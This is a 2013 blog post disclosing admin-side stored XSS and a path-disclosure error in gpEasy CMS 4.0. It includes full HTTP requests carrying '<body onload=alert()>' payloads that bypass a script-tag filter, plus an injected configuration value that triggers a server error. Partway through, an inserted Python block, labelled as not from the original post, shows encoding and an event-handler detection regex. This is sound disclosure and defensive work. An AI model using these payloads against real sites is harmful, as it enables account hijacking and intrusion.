Sunday 26 May 2013

[EN] gpEasy 4.0 XSS'ed

Hi,

there is a new release of gpEasy CMS, version 4.0.

I decided to post it here too.

Of course, all vulnerable parts of this CMS are located in the part dedicated to the logged-in admin,
so maybe you should consider them low-severity vulnerabilities (... CSRF? ;) ).

Anyway, maybe a few of you will find it interesting.

I should mention here that the gpEasy Team is developing better and better filters,
so we will see what they do in the next version.

Here we go:

The first one, detailed below, is an XSS vulnerability.

A simple <script> tag is filtered out. Anyway, this can be bypassed like this:

---request---
POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?gpreq=json&jsoncallback=jQuery183029823558424143826_1369418635239 HTTP/1.1
Host: 192.168.1.101
(...)
Cache-Control: no-cache

cmd=new_section&file=aaaaaaaaaaaa&type=<h1>aaaaaaaaaaaaaaaa<body onload=alert(/x/)>a<br>bbbbbbbbbbbbbbbbbbb</h1>&verified=95027f35b0&verified=95027f35b0&verified=95027f35b0&=Add%20New%20Area

---request---


and we will see in the response source code that our payload was added correctly:

---response---
(...)
>Delete</a></td></tr><tr class=\"even\"><td style=\"white-space:nowrap\">aaaaaaaaaa
aa</td><td><h1>aaaaaaaaaaaaaaaa<body onload=alert(/x/)>a<br>bbbbbbbbbbbbbbb
bbbb</h1></td><td>\"<span class=\"admin_note\">New Section</span>...\"</td>
<td style=\"white-space:nowrap\"><a href=\"/kuba/gpEasy4.0/
(...)

---response---


A similar situation in another place:

---request---

POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Extra?gpreq=json&jsoncallback=jQuery183029823558424143826_1369418635239 HTTP/1.1
Host: 192.168.1.101
(...)
Cache-Control: no-cache

cmd=new_section&file=aaaaaaaaaaaa&type='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&verified=95027f35b0&verified=95027f35b0&verified=95027f35b0&=Add%20New%20Area

---request---


The response will be similar.
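As an added illustration (not from the original post and not gpEasy's own code), the Python below decodes the `type` parameter from trimmed copies of the two request bodies above and contrasts the <script>-only blacklist the post describes with output encoding and a simple event-handler detection rule; the bodies, regexes and function names are my own constructions.

```python
import html
import re
from urllib.parse import parse_qs

# Trimmed copies of the two request bodies shown above (constructed; the second is still URL-encoded).
BODY_1 = ("cmd=new_section&file=aaaaaaaaaaaa&type=<h1>aaaaaaaaaaaaaaaa<body onload=alert(/x/)>"
          "a<br>bbbbbbbbbbbbbbbbbbb</h1>&verified=95027f35b0&=Add%20New%20Area")
BODY_2 = ("cmd=new_section&file=aaaaaaaaaaaa&type='%3e\"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e"
          "&verified=95027f35b0&=Add%20New%20Area")

# A blacklist that only knows about <script>, mirroring the filter behaviour the post describes.
SCRIPT_TAG = re.compile(r"<\s*/?\s*script[^>]*>", re.IGNORECASE)
# Any tag carrying an on* attribute (onload, onerror, ...) runs script with no <script> tag at all.
EVENT_HANDLER = re.compile(r"<[^>]*\son[a-z]+\s*=", re.IGNORECASE)


def type_param(body: str) -> str:
    """Decode the form body and return the 'type' field as the server sees it in $_POST."""
    return parse_qs(body, keep_blank_values=True)["type"][0]


def naive_filter(value: str) -> str:
    """Strip <script> tags only; every other tag and attribute passes through untouched."""
    return SCRIPT_TAG.sub("", value)


def safe_render(value: str) -> str:
    """Output-encode for an HTML text context so the browser treats the value as text, not markup."""
    return html.escape(value, quote=True)


def is_markup_injection(value: str) -> bool:
    """Detection rule for stored values: flag anything that still contains an event-handler attribute."""
    return EVENT_HANDLER.search(value) is not None


if __name__ == "__main__":
    for body in (BODY_1, BODY_2):
        raw = type_param(body)
        print("blacklist:", naive_filter(raw), "| flagged:", is_markup_injection(naive_filter(raw)))
        print("encoded  :", safe_render(raw), "| flagged:", is_markup_injection(safe_render(raw)))
```

Both payloads survive the blacklist unchanged and are flagged by the detection rule, while the encoded form contains no `<` at all and renders as literal text.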


Another situation where we have a small vuln is described below.
During some tests I found that gpEasy presents the full path to wwwroot.
Check it out:

---request---
POST /kuba/gpEasy4.0/gpEasy/index.php/Admin_Configuration?gpreq=json&jsoncallback=jQuery183008074821283823352_1369418498905 HTTP/1.1
Host: 192.168.1.101
(...)
Cache-Control: no-cache

title=My+gpEasy+CMS&keywords=gpEasy+CMS%2C+Easy+CMS%2C+Content+Management%2C+PHP%2C+Free+CMS%2C+Website+builder%2C+Open+Source&desc=A+new+gpEasy+CMS+installation.+You+can+change+your+site's+description+in+the+configuration.&colorbox_style=example1&language=en&langeditor=inherit&showsitemap=false&showsitemap=true&showlogin=false&showlogin=true&showgplink=false&showgplink=true&jquery=local&maximgarea=691200&maxthumbsize=100&auto_redir=90&HTML_Tidy='%2bOR%2b1%3d1--&Report_Errors=false&combinejs=false&combinejs=true&combinecss=false&combinecss=true&etag_headers=false&etag_headers=true&resize_images=false&resize_images=true&toemail=admin%40here.com&toname=&from_address=AutomatedSender%40192.168.1.101&from_name=Automated+Sender&from_use_user=false&require_email=&mail_method=mail&sendmail_path=&smtp_hosts=&smtp_user=&smtp_pass=&recaptcha_public=&recaptcha_private=&recaptcha_language=inherit&cmd=save_config&verified=95027f35b0&verified=95027f35b0&aaa=Save

---request---

Response for this one looks like this:

---response---
HTTP/1.0 500 Internal Server Error
Date: Fri, 24 May 2013 18:07:02 GMT
(...)
Content-Type: text/html; charset=utf-8

<p>Oops, an error occurred while generating this page.<p><h3>Error Details</h3><pre>array(
   [type] =&gt; (integer)4
   [message] =&gt; (string)syntax error, unexpected ''in' (T_ENCAPSED_AND_WHITESPACE)
   [file] =&gt; (string)/home/kuba/public_html/gpEasy4.0/gpEasy/data/_site/config.php
   [line] =&gt; (integer)92
   [request] =&gt; (string)/kuba/gpEasy4.0/gpEasy/index.php/Admin_Configuration?gpreq=json&amp;jsoncallback=jQuery183008074821283823352_1369418498905
   [time] =&gt; (integer)1369418822
   [request_method] =&gt; (string)POST
   [file_modified] =&gt; (integer)1369418822
   [file_size] =&gt; (integer)3082
)</pre><p><a href="">Reload this page</a></p><p style="font-size:90%">Note: Error details are only displayed for logged in administrators</p>
---response---


The HTML_Tidy parameter is vulnerable, but if you want, you should test it again yourself,
because I think it could be a bug similar to the one I found in Drupal:
if you send 'too many requests' to the web app, it will simply crash (and the error will be displayed).

Thanks to the gpEasy Team for a fast reply. Good job!

Cheers o/
